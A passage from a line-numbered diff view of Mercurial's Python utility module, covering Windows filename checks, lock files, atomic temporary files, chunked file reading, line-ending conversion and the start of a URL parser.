2037 2039 >>> checkwinfilename(b"foo\\/bar")
2038 2040 "directory name ends with '\\', which is invalid on Windows"
2039 2041 '''
2040 2042 if path.endswith(b'\\'):
2041 2043 return _(b"filename ends with '\\', which is invalid on Windows")
2042 2044 if b'\\/' in path:
2043 2045 return _(b"directory name ends with '\\', which is invalid on Windows")
2044 2046 for n in path.replace(b'\\', b'/').split(b'/'):
2045 2047 if not n:
2046 2048 continue
2047 2049 for c in _filenamebytestr(n):
2048 2050 if c in _winreservedchars:
2049 2051 return (
2050 2052 _(
2051 2053 b"filename contains '%s', which is reserved "
2052 2054 b"on Windows"
2053 2055 )
2054 2056 % c
2055 2057 )
2056 2058 if ord(c) <= 31:
2057 2059 return _(
2058 2060 b"filename contains '%s', which is invalid on Windows"
2059 2061 ) % stringutil.escapestr(c)
2060 2062 base = n.split(b'.')[0]
2061 2063 if base and base.lower() in _winreservednames:
2062 2064 return (
2063 2065 _(b"filename contains '%s', which is reserved on Windows")
2064 2066 % base
2065 2067 )
2066 2068 t = n[-1:]
2067 2069 if t in b'. ' and n not in b'..':
2068 2070 return (
2069 2071 _(
2070 2072 b"filename ends with '%s', which is not allowed "
2071 2073 b"on Windows"
2072 2074 )
2073 2075 % t
2074 2076 )
2075 2077
2076 2078
2077 2079 timer = getattr(time, "perf_counter", None)
2078 2080
2079 2081 if pycompat.iswindows:
2080 2082 checkosfilename = checkwinfilename
2081 2083 if not timer:
2082 2084 timer = time.clock
2083 2085 else:
2084 2086 # mercurial.windows doesn't have platform.checkosfilename
2085 2087 checkosfilename = platform.checkosfilename # pytype: disable=module-attr
2086 2088 if not timer:
2087 2089 timer = time.time
2088 2090
2089 2091
2090 2092 def makelock(info, pathname):
2091 2093 """Create a lock file atomically if possible
2092 2094
2093 2095 This may leave a stale lock file if symlink isn't supported and signal
2094 2096 interrupt is enabled.
2095 2097 """
2096 2098 try:
2097 2099 return os.symlink(info, pathname)
2098 2100 except OSError as why:
2099 2101 if why.errno == errno.EEXIST:
2100 2102 raise
2101 2103 except AttributeError: # no symlink in os
2102 2104 pass
2103 2105
2104 2106 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
2105 2107 ld = os.open(pathname, flags)
2106 2108 os.write(ld, info)
2107 2109 os.close(ld)
2108 2110
2109 2111
2110 2112 def readlock(pathname):
2111 2113 try:
2112 2114 return readlink(pathname)
2113 2115 except OSError as why:
2114 2116 if why.errno not in (errno.EINVAL, errno.ENOSYS):
2115 2117 raise
2116 2118 except AttributeError: # no symlink in os
2117 2119 pass
2118 2120 with posixfile(pathname, b'rb') as fp:
2119 2121 return fp.read()
2120 2122
2121 2123
2122 2124 def fstat(fp):
2123 2125 '''stat file object that may not have fileno method.'''
2124 2126 try:
2125 2127 return os.fstat(fp.fileno())
2126 2128 except AttributeError:
2127 2129 return os.stat(fp.name)
2128 2130
2129 2131
2130 2132 # File system features
2131 2133
2132 2134
2133 2135 def fscasesensitive(path):
2134 2136 """
2135 2137 Return true if the given path is on a case-sensitive filesystem
2136 2138
2137 2139 Requires a path (like /foo/.hg) ending with a foldable final
2138 2140 directory component.
2139 2141 """
2140 2142 s1 = os.lstat(path)
2141 2143 d, b = os.path.split(path)
2142 2144 b2 = b.upper()
2143 2145 if b == b2:
2144 2146 b2 = b.lower()
2145 2147 if b == b2:
2146 2148 return True # no evidence against case sensitivity
2147 2149 p2 = os.path.join(d, b2)
2148 2150 try:
2149 2151 s2 = os.lstat(p2)
2150 2152 if s2 == s1:
2151 2153 return False
2152 2154 return True
2153 2155 except OSError:
2154 2156 return True
2155 2157
2156 2158
2157 2159 try:
2158 2160 import re2 # pytype: disable=import-error
2159 2161
2160 2162 _re2 = None
2161 2163 except ImportError:
2162 2164 _re2 = False
2163 2165
2164 2166
2165 2167 class _re(object):
2166 2168 def _checkre2(self):
2167 2169 global _re2
2168 2170 try:
2169 2171 # check if match works, see issue3964
2170 2172 _re2 = bool(re2.match(r'\[([^\[]+)\]', b'[ui]'))
2171 2173 except ImportError:
2172 2174 _re2 = False
2173 2175
2174 2176 def compile(self, pat, flags=0):
2175 2177 '''Compile a regular expression, using re2 if possible
2176 2178
2177 2179 For best performance, use only re2-compatible regexp features. The
2178 2180 only flags from the re module that are re2-compatible are
2179 2181 IGNORECASE and MULTILINE.'''
2180 2182 if _re2 is None:
2181 2183 self._checkre2()
2182 2184 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
2183 2185 if flags & remod.IGNORECASE:
2184 2186 pat = b'(?i)' + pat
2185 2187 if flags & remod.MULTILINE:
2186 2188 pat = b'(?m)' + pat
2187 2189 try:
2188 2190 return re2.compile(pat)
2189 2191 except re2.error:
2190 2192 pass
2191 2193 return remod.compile(pat, flags)
2192 2194
2193 2195 @propertycache
2194 2196 def escape(self):
2195 2197 '''Return the version of escape corresponding to self.compile.
2196 2198
2197 2199 This is imperfect because whether re2 or re is used for a particular
2198 2200 function depends on the flags, etc, but it's the best we can do.
2199 2201 '''
2200 2202 global _re2
2201 2203 if _re2 is None:
2202 2204 self._checkre2()
2203 2205 if _re2:
2204 2206 return re2.escape
2205 2207 else:
2206 2208 return remod.escape
2207 2209
2208 2210
2209 2211 re = _re()
2210 2212
2211 2213 _fspathcache = {}
2212 2214
2213 2215
2214 2216 def fspath(name, root):
2215 2217 '''Get name in the case stored in the filesystem
2216 2218
2217 2219 The name should be relative to root, and be normcase-ed for efficiency.
2218 2220
2219 2221 Note that this function is unnecessary, and should not be
2220 2222 called, for case-sensitive filesystems (simply because it's expensive).
2221 2223
2222 2224 The root should be normcase-ed, too.
2223 2225 '''
2224 2226
2225 2227 def _makefspathcacheentry(dir):
2226 2228 return {normcase(n): n for n in os.listdir(dir)}
2227 2229
2228 2230 seps = pycompat.ossep
2229 2231 if pycompat.osaltsep:
2230 2232 seps = seps + pycompat.osaltsep
2231 2233 # Protect backslashes. This gets silly very quickly.
2232 2234 seps.replace(b'\\', b'\\\\')
2233 2235 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
2234 2236 dir = os.path.normpath(root)
2235 2237 result = []
2236 2238 for part, sep in pattern.findall(name):
2237 2239 if sep:
2238 2240 result.append(sep)
2239 2241 continue
2240 2242
2241 2243 if dir not in _fspathcache:
2242 2244 _fspathcache[dir] = _makefspathcacheentry(dir)
2243 2245 contents = _fspathcache[dir]
2244 2246
2245 2247 found = contents.get(part)
2246 2248 if not found:
2247 2249 # retry "once per directory" per "dirstate.walk" which
2248 2250 # may take place for each patches of "hg qpush", for example
2249 2251 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
2250 2252 found = contents.get(part)
2251 2253
2252 2254 result.append(found or part)
2253 2255 dir = os.path.join(dir, part)
2254 2256
2255 2257 return b''.join(result)
2256 2258
2257 2259
2258 2260 def checknlink(testfile):
2259 2261 '''check whether hardlink count reporting works properly'''
2260 2262
2261 2263 # testfile may be open, so we need a separate file for checking to
2262 2264 # work around issue2543 (or testfile may get lost on Samba shares)
2263 2265 f1, f2, fp = None, None, None
2264 2266 try:
2265 2267 fd, f1 = pycompat.mkstemp(
2266 2268 prefix=b'.%s-' % os.path.basename(testfile),
2267 2269 suffix=b'1~',
2268 2270 dir=os.path.dirname(testfile),
2269 2271 )
2270 2272 os.close(fd)
2271 2273 f2 = b'%s2~' % f1[:-2]
2272 2274
2273 2275 oslink(f1, f2)
2274 2276 # nlinks() may behave differently for files on Windows shares if
2275 2277 # the file is open.
2276 2278 fp = posixfile(f2)
2277 2279 return nlinks(f2) > 1
2278 2280 except OSError:
2279 2281 return False
2280 2282 finally:
2281 2283 if fp is not None:
2282 2284 fp.close()
2283 2285 for f in (f1, f2):
2284 2286 try:
2285 2287 if f is not None:
2286 2288 os.unlink(f)
2287 2289 except OSError:
2288 2290 pass
2289 2291
2290 2292
2291 2293 def endswithsep(path):
2292 2294 '''Check path ends with os.sep or os.altsep.'''
2293 2295 return (
2294 2296 path.endswith(pycompat.ossep)
2295 2297 or pycompat.osaltsep
2296 2298 and path.endswith(pycompat.osaltsep)
2297 2299 )
2298 2300
2299 2301
2300 2302 def splitpath(path):
2301 2303 '''Split path by os.sep.
2302 2304 Note that this function does not use os.altsep because this is
2303 2305 an alternative of simple "xxx.split(os.sep)".
2304 2306 It is recommended to use os.path.normpath() before using this
2305 2307 function if need.'''
2306 2308 return path.split(pycompat.ossep)
2307 2309
2308 2310
2309 2311 def mktempcopy(name, emptyok=False, createmode=None, enforcewritable=False):
2310 2312 """Create a temporary file with the same contents from name
2311 2313
2312 2314 The permission bits are copied from the original file.
2313 2315
2314 2316 If the temporary file is going to be truncated immediately, you
2315 2317 can use emptyok=True as an optimization.
2316 2318
2317 2319 Returns the name of the temporary file.
2318 2320 """
2319 2321 d, fn = os.path.split(name)
2320 2322 fd, temp = pycompat.mkstemp(prefix=b'.%s-' % fn, suffix=b'~', dir=d)
2321 2323 os.close(fd)
2322 2324 # Temporary files are created with mode 0600, which is usually not
2323 2325 # what we want. If the original file already exists, just copy
2324 2326 # its mode. Otherwise, manually obey umask.
2325 2327 copymode(name, temp, createmode, enforcewritable)
2326 2328
2327 2329 if emptyok:
2328 2330 return temp
2329 2331 try:
2330 2332 try:
2331 2333 ifp = posixfile(name, b"rb")
2332 2334 except IOError as inst:
2333 2335 if inst.errno == errno.ENOENT:
2334 2336 return temp
2335 2337 if not getattr(inst, 'filename', None):
2336 2338 inst.filename = name
2337 2339 raise
2338 2340 ofp = posixfile(temp, b"wb")
2339 2341 for chunk in filechunkiter(ifp):
2340 2342 ofp.write(chunk)
2341 2343 ifp.close()
2342 2344 ofp.close()
2343 2345 except: # re-raises
2344 2346 try:
2345 2347 os.unlink(temp)
2346 2348 except OSError:
2347 2349 pass
2348 2350 raise
2349 2351 return temp
2350 2352
2351 2353
2352 2354 class filestat(object):
2353 2355 """help to exactly detect change of a file
2354 2356
2355 2357 'stat' attribute is result of 'os.stat()' if specified 'path'
2356 2358 exists. Otherwise, it is None. This can avoid preparative
2357 2359 'exists()' examination on client side of this class.
2358 2360 """
2359 2361
2360 2362 def __init__(self, stat):
2361 2363 self.stat = stat
2362 2364
2363 2365 @classmethod
2364 2366 def frompath(cls, path):
2365 2367 try:
2366 2368 stat = os.stat(path)
2367 2369 except OSError as err:
2368 2370 if err.errno != errno.ENOENT:
2369 2371 raise
2370 2372 stat = None
2371 2373 return cls(stat)
2372 2374
2373 2375 @classmethod
2374 2376 def fromfp(cls, fp):
2375 2377 stat = os.fstat(fp.fileno())
2376 2378 return cls(stat)
2377 2379
2378 2380 __hash__ = object.__hash__
2379 2381
2380 2382 def __eq__(self, old):
2381 2383 try:
2382 2384 # if ambiguity between stat of new and old file is
2383 2385 # avoided, comparison of size, ctime and mtime is enough
2384 2386 # to exactly detect change of a file regardless of platform
2385 2387 return (
2386 2388 self.stat.st_size == old.stat.st_size
2387 2389 and self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME]
2388 2390 and self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME]
2389 2391 )
2390 2392 except AttributeError:
2391 2393 pass
2392 2394 try:
2393 2395 return self.stat is None and old.stat is None
2394 2396 except AttributeError:
2395 2397 return False
2396 2398
2397 2399 def isambig(self, old):
2398 2400 """Examine whether new (= self) stat is ambiguous against old one
2399 2401
2400 2402 "S[N]" below means stat of a file at N-th change:
2401 2403
2402 2404 - S[n-1].ctime < S[n].ctime: can detect change of a file
2403 2405 - S[n-1].ctime == S[n].ctime
2404 2406 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2405 2407 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2406 2408 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2407 2409 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2408 2410
2409 2411 Case (*2) above means that a file was changed twice or more at
2410 2412 same time in sec (= S[n-1].ctime), and comparison of timestamp
2411 2413 is ambiguous.
2412 2414
2413 2415 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2414 2416 timestamp is ambiguous".
2415 2417
2416 2418 But advancing mtime only in case (*2) doesn't work as
2417 2419 expected, because naturally advanced S[n].mtime in case (*1)
2418 2420 might be equal to manually advanced S[n-1 or earlier].mtime.
2419 2421
2420 2422 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2421 2423 treated as ambiguous regardless of mtime, to avoid overlooking
2422 2424 by confliction between such mtime.
2423 2425
2424 2426 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2425 2427 S[n].mtime", even if size of a file isn't changed.
2426 2428 """
2427 2429 try:
2428 2430 return self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME]
2429 2431 except AttributeError:
2430 2432 return False
2431 2433
2432 2434 def avoidambig(self, path, old):
2433 2435 """Change file stat of specified path to avoid ambiguity
2434 2436
2435 2437 'old' should be previous filestat of 'path'.
2436 2438
2437 2439 This skips avoiding ambiguity, if a process doesn't have
2438 2440 appropriate privileges for 'path'. This returns False in this
2439 2441 case.
2440 2442
2441 2443 Otherwise, this returns True, as "ambiguity is avoided".
2442 2444 """
2443 2445 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7FFFFFFF
2444 2446 try:
2445 2447 os.utime(path, (advanced, advanced))
2446 2448 except OSError as inst:
2447 2449 if inst.errno == errno.EPERM:
2448 2450 # utime() on the file created by another user causes EPERM,
2449 2451 # if a process doesn't have appropriate privileges
2450 2452 return False
2451 2453 raise
2452 2454 return True
2453 2455
2454 2456 def __ne__(self, other):
2455 2457 return not self == other
2456 2458
2457 2459
2458 2460 class atomictempfile(object):
2459 2461 '''writable file object that atomically updates a file
2460 2462
2461 2463 All writes will go to a temporary copy of the original file. Call
2462 2464 close() when you are done writing, and atomictempfile will rename
2463 2465 the temporary copy to the original name, making the changes
2464 2466 visible. If the object is destroyed without being closed, all your
2465 2467 writes are discarded.
2466 2468
2467 2469 checkambig argument of constructor is used with filestat, and is
2468 2470 useful only if target file is guarded by any lock (e.g. repo.lock
2469 2471 or repo.wlock).
2470 2472 '''
2471 2473
2472 2474 def __init__(self, name, mode=b'w+b', createmode=None, checkambig=False):
2473 2475 self.__name = name # permanent name
2474 2476 self._tempname = mktempcopy(
2475 2477 name,
2476 2478 emptyok=(b'w' in mode),
2477 2479 createmode=createmode,
2478 2480 enforcewritable=(b'w' in mode),
2479 2481 )
2480 2482
2481 2483 self._fp = posixfile(self._tempname, mode)
2482 2484 self._checkambig = checkambig
2483 2485
2484 2486 # delegated methods
2485 2487 self.read = self._fp.read
2486 2488 self.write = self._fp.write
2487 2489 self.seek = self._fp.seek
2488 2490 self.tell = self._fp.tell
2489 2491 self.fileno = self._fp.fileno
2490 2492
2491 2493 def close(self):
2492 2494 if not self._fp.closed:
2493 2495 self._fp.close()
2494 2496 filename = localpath(self.__name)
2495 2497 oldstat = self._checkambig and filestat.frompath(filename)
2496 2498 if oldstat and oldstat.stat:
2497 2499 rename(self._tempname, filename)
2498 2500 newstat = filestat.frompath(filename)
2499 2501 if newstat.isambig(oldstat):
2500 2502 # stat of changed file is ambiguous to original one
2501 2503 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7FFFFFFF
2502 2504 os.utime(filename, (advanced, advanced))
2503 2505 else:
2504 2506 rename(self._tempname, filename)
2505 2507
2506 2508 def discard(self):
2507 2509 if not self._fp.closed:
2508 2510 try:
2509 2511 os.unlink(self._tempname)
2510 2512 except OSError:
2511 2513 pass
2512 2514 self._fp.close()
2513 2515
2514 2516 def __del__(self):
2515 2517 if safehasattr(self, '_fp'): # constructor actually did something
2516 2518 self.discard()
2517 2519
2518 2520 def __enter__(self):
2519 2521 return self
2520 2522
2521 2523 def __exit__(self, exctype, excvalue, traceback):
2522 2524 if exctype is not None:
2523 2525 self.discard()
2524 2526 else:
2525 2527 self.close()
2526 2528
2527 2529
2528 2530 def unlinkpath(f, ignoremissing=False, rmdir=True):
2529 2531 """unlink and remove the directory if it is empty"""
2530 2532 if ignoremissing:
2531 2533 tryunlink(f)
2532 2534 else:
2533 2535 unlink(f)
2534 2536 if rmdir:
2535 2537 # try removing directories that might now be empty
2536 2538 try:
2537 2539 removedirs(os.path.dirname(f))
2538 2540 except OSError:
2539 2541 pass
2540 2542
2541 2543
2542 2544 def tryunlink(f):
2543 2545 """Attempt to remove a file, ignoring ENOENT errors."""
2544 2546 try:
2545 2547 unlink(f)
2546 2548 except OSError as e:
2547 2549 if e.errno != errno.ENOENT:
2548 2550 raise
2549 2551
2550 2552
2551 2553 def makedirs(name, mode=None, notindexed=False):
2552 2554 """recursive directory creation with parent mode inheritance
2553 2555
2554 2556 Newly created directories are marked as "not to be indexed by
2555 2557 the content indexing service", if ``notindexed`` is specified
2556 2558 for "write" mode access.
2557 2559 """
2558 2560 try:
2559 2561 makedir(name, notindexed)
2560 2562 except OSError as err:
2561 2563 if err.errno == errno.EEXIST:
2562 2564 return
2563 2565 if err.errno != errno.ENOENT or not name:
2564 2566 raise
2565 2567 parent = os.path.dirname(os.path.abspath(name))
2566 2568 if parent == name:
2567 2569 raise
2568 2570 makedirs(parent, mode, notindexed)
2569 2571 try:
2570 2572 makedir(name, notindexed)
2571 2573 except OSError as err:
2572 2574 # Catch EEXIST to handle races
2573 2575 if err.errno == errno.EEXIST:
2574 2576 return
2575 2577 raise
2576 2578 if mode is not None:
2577 2579 os.chmod(name, mode)
2578 2580
2579 2581
2580 2582 def readfile(path):
2581 2583 with open(path, b'rb') as fp:
2582 2584 return fp.read()
2583 2585
2584 2586
2585 2587 def writefile(path, text):
2586 2588 with open(path, b'wb') as fp:
2587 2589 fp.write(text)
2588 2590
2589 2591
2590 2592 def appendfile(path, text):
2591 2593 with open(path, b'ab') as fp:
2592 2594 fp.write(text)
2593 2595
2594 2596
2595 2597 class chunkbuffer(object):
2596 2598 """Allow arbitrary sized chunks of data to be efficiently read from an
2597 2599 iterator over chunks of arbitrary size."""
2598 2600
2599 2601 def __init__(self, in_iter):
2600 2602 """in_iter is the iterator that's iterating over the input chunks."""
2601 2603
2602 2604 def splitbig(chunks):
2603 2605 for chunk in chunks:
2604 2606 if len(chunk) > 2 ** 20:
2605 2607 pos = 0
2606 2608 while pos < len(chunk):
2607 2609 end = pos + 2 ** 18
2608 2610 yield chunk[pos:end]
2609 2611 pos = end
2610 2612 else:
2611 2613 yield chunk
2612 2614
2613 2615 self.iter = splitbig(in_iter)
2614 2616 self._queue = collections.deque()
2615 2617 self._chunkoffset = 0
2616 2618
2617 2619 def read(self, l=None):
2618 2620 """Read L bytes of data from the iterator of chunks of data.
2619 2621 Returns less than L bytes if the iterator runs dry.
2620 2622
2621 2623 If size parameter is omitted, read everything"""
2622 2624 if l is None:
2623 2625 return b''.join(self.iter)
2624 2626
2625 2627 left = l
2626 2628 buf = []
2627 2629 queue = self._queue
2628 2630 while left > 0:
2629 2631 # refill the queue
2630 2632 if not queue:
2631 2633 target = 2 ** 18
2632 2634 for chunk in self.iter:
2633 2635 queue.append(chunk)
2634 2636 target -= len(chunk)
2635 2637 if target <= 0:
2636 2638 break
2637 2639 if not queue:
2638 2640 break
2639 2641
2640 2642 # The easy way to do this would be to queue.popleft(), modify the
2641 2643 # chunk (if necessary), then queue.appendleft(). However, for cases
2642 2644 # where we read partial chunk content, this incurs 2 dequeue
2643 2645 # mutations and creates a new str for the remaining chunk in the
2644 2646 # queue. Our code below avoids this overhead.
2645 2647
2646 2648 chunk = queue[0]
2647 2649 chunkl = len(chunk)
2648 2650 offset = self._chunkoffset
2649 2651
2650 2652 # Use full chunk.
2651 2653 if offset == 0 and left >= chunkl:
2652 2654 left -= chunkl
2653 2655 queue.popleft()
2654 2656 buf.append(chunk)
2655 2657 # self._chunkoffset remains at 0.
2656 2658 continue
2657 2659
2658 2660 chunkremaining = chunkl - offset
2659 2661
2660 2662 # Use all of unconsumed part of chunk.
2661 2663 if left >= chunkremaining:
2662 2664 left -= chunkremaining
2663 2665 queue.popleft()
2664 2666 # offset == 0 is enabled by block above, so this won't merely
2665 2667 # copy via ``chunk[0:]``.
2666 2668 buf.append(chunk[offset:])
2667 2669 self._chunkoffset = 0
2668 2670
2669 2671 # Partial chunk needed.
2670 2672 else:
2671 2673 buf.append(chunk[offset : offset + left])
2672 2674 self._chunkoffset += left
2673 2675 left -= chunkremaining
2674 2676
2675 2677 return b''.join(buf)
2676 2678
2677 2679
2678 2680 def filechunkiter(f, size=131072, limit=None):
2679 2681 """Create a generator that produces the data in the file size
2680 2682 (default 131072) bytes at a time, up to optional limit (default is
2681 2683 to read all data). Chunks may be less than size bytes if the
2682 2684 chunk is the last chunk in the file, or the file is a socket or
2683 2685 some other type of file that sometimes reads less data than is
2684 2686 requested."""
2685 2687 assert size >= 0
2686 2688 assert limit is None or limit >= 0
2687 2689 while True:
2688 2690 if limit is None:
2689 2691 nbytes = size
2690 2692 else:
2691 2693 nbytes = min(limit, size)
2692 2694 s = nbytes and f.read(nbytes)
2693 2695 if not s:
2694 2696 break
2695 2697 if limit:
2696 2698 limit -= len(s)
2697 2699 yield s
2698 2700
2699 2701
2700 2702 class cappedreader(object):
2701 2703 """A file object proxy that allows reading up to N bytes.
2702 2704
2703 2705 Given a source file object, instances of this type allow reading up to
2704 2706 N bytes from that source file object. Attempts to read past the allowed
2705 2707 limit are treated as EOF.
2706 2708
2707 2709 It is assumed that I/O is not performed on the original file object
2708 2710 in addition to I/O that is performed by this instance. If there is,
2709 2711 state tracking will get out of sync and unexpected results will ensue.
2710 2712 """
2711 2713
2712 2714 def __init__(self, fh, limit):
2713 2715 """Allow reading up to <limit> bytes from <fh>."""
2714 2716 self._fh = fh
2715 2717 self._left = limit
2716 2718
2717 2719 def read(self, n=-1):
2718 2720 if not self._left:
2719 2721 return b''
2720 2722
2721 2723 if n < 0:
2722 2724 n = self._left
2723 2725
2724 2726 data = self._fh.read(min(n, self._left))
2725 2727 self._left -= len(data)
2726 2728 assert self._left >= 0
2727 2729
2728 2730 return data
2729 2731
2730 2732 def readinto(self, b):
2731 2733 res = self.read(len(b))
2732 2734 if res is None:
2733 2735 return None
2734 2736
2735 2737 b[0 : len(res)] = res
2736 2738 return len(res)
2737 2739
2738 2740
2739 2741 def unitcountfn(*unittable):
2740 2742 '''return a function that renders a readable count of some quantity'''
2741 2743
2742 2744 def go(count):
2743 2745 for multiplier, divisor, format in unittable:
2744 2746 if abs(count) >= divisor * multiplier:
2745 2747 return format % (count / float(divisor))
2746 2748 return unittable[-1][2] % count
2747 2749
2748 2750 return go
2749 2751
2750 2752
2751 2753 def processlinerange(fromline, toline):
2752 2754 """Check that linerange <fromline>:<toline> makes sense and return a
2753 2755 0-based range.
2754 2756
2755 2757 >>> processlinerange(10, 20)
2756 2758 (9, 20)
2757 2759 >>> processlinerange(2, 1)
2758 2760 Traceback (most recent call last):
2759 2761 ...
2760 2762 ParseError: line range must be positive
2761 2763 >>> processlinerange(0, 5)
2762 2764 Traceback (most recent call last):
2763 2765 ...
2764 2766 ParseError: fromline must be strictly positive
2765 2767 """
2766 2768 if toline - fromline < 0:
2767 2769 raise error.ParseError(_(b"line range must be positive"))
2768 2770 if fromline < 1:
2769 2771 raise error.ParseError(_(b"fromline must be strictly positive"))
2770 2772 return fromline - 1, toline
2771 2773
2772 2774
2773 2775 bytecount = unitcountfn(
2774 2776 (100, 1 << 30, _(b'%.0f GB')),
2775 2777 (10, 1 << 30, _(b'%.1f GB')),
2776 2778 (1, 1 << 30, _(b'%.2f GB')),
2777 2779 (100, 1 << 20, _(b'%.0f MB')),
2778 2780 (10, 1 << 20, _(b'%.1f MB')),
2779 2781 (1, 1 << 20, _(b'%.2f MB')),
2780 2782 (100, 1 << 10, _(b'%.0f KB')),
2781 2783 (10, 1 << 10, _(b'%.1f KB')),
2782 2784 (1, 1 << 10, _(b'%.2f KB')),
2783 2785 (1, 1, _(b'%.0f bytes')),
2784 2786 )
2785 2787
2786 2788
2787 2789 class transformingwriter(object):
2788 2790 """Writable file wrapper to transform data by function"""
2789 2791
2790 2792 def __init__(self, fp, encode):
2791 2793 self._fp = fp
2792 2794 self._encode = encode
2793 2795
2794 2796 def close(self):
2795 2797 self._fp.close()
2796 2798
2797 2799 def flush(self):
2798 2800 self._fp.flush()
2799 2801
2800 2802 def write(self, data):
2801 2803 return self._fp.write(self._encode(data))
2802 2804
2803 2805
2804 2806 # Matches a single EOL which can either be a CRLF where repeated CR
2805 2807 # are removed or a LF. We do not care about old Macintosh files, so a
2806 2808 # stray CR is an error.
2807 2809 _eolre = remod.compile(br'\r*\n')
2808 2810
2809 2811
2810 2812 def tolf(s):
2811 2813 return _eolre.sub(b'\n', s)
2812 2814
2813 2815
2814 2816 def tocrlf(s):
2815 2817 return _eolre.sub(b'\r\n', s)
2816 2818
2817 2819
2818 2820 def _crlfwriter(fp):
2819 2821 return transformingwriter(fp, tocrlf)
2820 2822
2821 2823
2822 2824 if pycompat.oslinesep == b'\r\n':
2823 2825 tonativeeol = tocrlf
2824 2826 fromnativeeol = tolf
2825 2827 nativeeolwriter = _crlfwriter
2826 2828 else:
2827 2829 tonativeeol = pycompat.identity
2828 2830 fromnativeeol = pycompat.identity
2829 2831 nativeeolwriter = pycompat.identity
2830 2832
2831 2833 if pyplatform.python_implementation() == b'CPython' and sys.version_info < (
2832 2834 3,
2833 2835 0,
2834 2836 ):
2835 2837 # There is an issue in CPython that some IO methods do not handle EINTR
2836 2838 # correctly. The following table shows what CPython version (and functions)
2837 2839 # are affected (buggy: has the EINTR bug, okay: otherwise):
2838 2840 #
2839 2841 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2840 2842 # --------------------------------------------------
2841 2843 # fp.__iter__ | buggy | buggy | okay
2842 2844 # fp.read* | buggy | okay [1] | okay
2843 2845 #
2844 2846 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2845 2847 #
2846 2848 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2847 2849 # like "read*" work fine, as we do not support Python < 2.7.4.
2848 2850 #
2849 2851 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2850 2852 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2851 2853 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2852 2854 # fp.__iter__ but not other fp.read* methods.
2853 2855 #
2854 2856 # On modern systems like Linux, the "read" syscall cannot be interrupted
2855 2857 # when reading "fast" files like on-disk files. So the EINTR issue only
2856 2858 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2857 2859 # files approximately as "fast" files and use the fast (unsafe) code path,
2858 2860 # to minimize the performance impact.
2859 2861
2860 2862 def iterfile(fp):
2861 2863 fastpath = True
2862 2864 if type(fp) is file:
2863 2865 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2864 2866 if fastpath:
2865 2867 return fp
2866 2868 else:
2867 2869 # fp.readline deals with EINTR correctly, use it as a workaround.
2868 2870 return iter(fp.readline, b'')
2869 2871
2870 2872
2871 2873 else:
2872 2874 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2873 2875 def iterfile(fp):
2874 2876 return fp
2875 2877
2876 2878
2877 2879 def iterlines(iterator):
2878 2880 for chunk in iterator:
2879 2881 for line in chunk.splitlines():
2880 2882 yield line
2881 2883
2882 2884
2883 2885 def expandpath(path):
2884 2886 return os.path.expanduser(os.path.expandvars(path))
2885 2887
2886 2888
2887 2889 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2888 2890 """Return the result of interpolating items in the mapping into string s.
2889 2891
2890 2892 prefix is a single character string, or a two character string with
2891 2893 a backslash as the first character if the prefix needs to be escaped in
2892 2894 a regular expression.
2893 2895
2894 2896 fn is an optional function that will be applied to the replacement text
2895 2897 just before replacement.
2896 2898
2897 2899 escape_prefix is an optional flag that allows using doubled prefix for
2898 2900 its escaping.
2899 2901 """
2900 2902 fn = fn or (lambda s: s)
2901 2903 patterns = b'|'.join(mapping.keys())
2902 2904 if escape_prefix:
2903 2905 patterns += b'|' + prefix
2904 2906 if len(prefix) > 1:
2905 2907 prefix_char = prefix[1:]
2906 2908 else:
2907 2909 prefix_char = prefix
2908 2910 mapping[prefix_char] = prefix_char
2909 2911 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2910 2912 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2911 2913
2912 2914
2913 2915 def getport(port):
2914 2916 """Return the port for a given network service.
2915 2917
2916 2918 If port is an integer, it's returned as is. If it's a string, it's
2917 2919 looked up using socket.getservbyname(). If there's no matching
2918 2920 service, error.Abort is raised.
2919 2921 """
2920 2922 try:
2921 2923 return int(port)
2922 2924 except ValueError:
2923 2925 pass
2924 2926
2925 2927 try:
2926 2928 return socket.getservbyname(pycompat.sysstr(port))
2927 2929 except socket.error:
2928 2930 raise error.Abort(
2929 2931 _(b"no port number associated with service '%s'") % port
2930 2932 )
2931 2933
2932 2934
2933 2935 class url(object):
2934 2936 r"""Reliable URL parser.
2935 2937
2936 2938 This parses URLs and provides attributes for the following
2937 2939 components:
2938 2940
2939 2941 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2940 2942
2941 2943 Missing components are set to None. The only exception is
2942 2944 fragment, which is set to '' if present but empty.
2943 2945
2944 2946 If parsefragment is False, fragment is included in query. If
2945 2947 parsequery is False, query is included in path. If both are
2946 2948 False, both fragment and query are included in path.
2947 2949
2948 2950 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2949 2951
2950 2952 Note that for backward compatibility reasons, bundle URLs do not
2951 2953 take host names. That means 'bundle://../' has a path of '../'.
2952 2954
2953 2955 Examples:
2954 2956
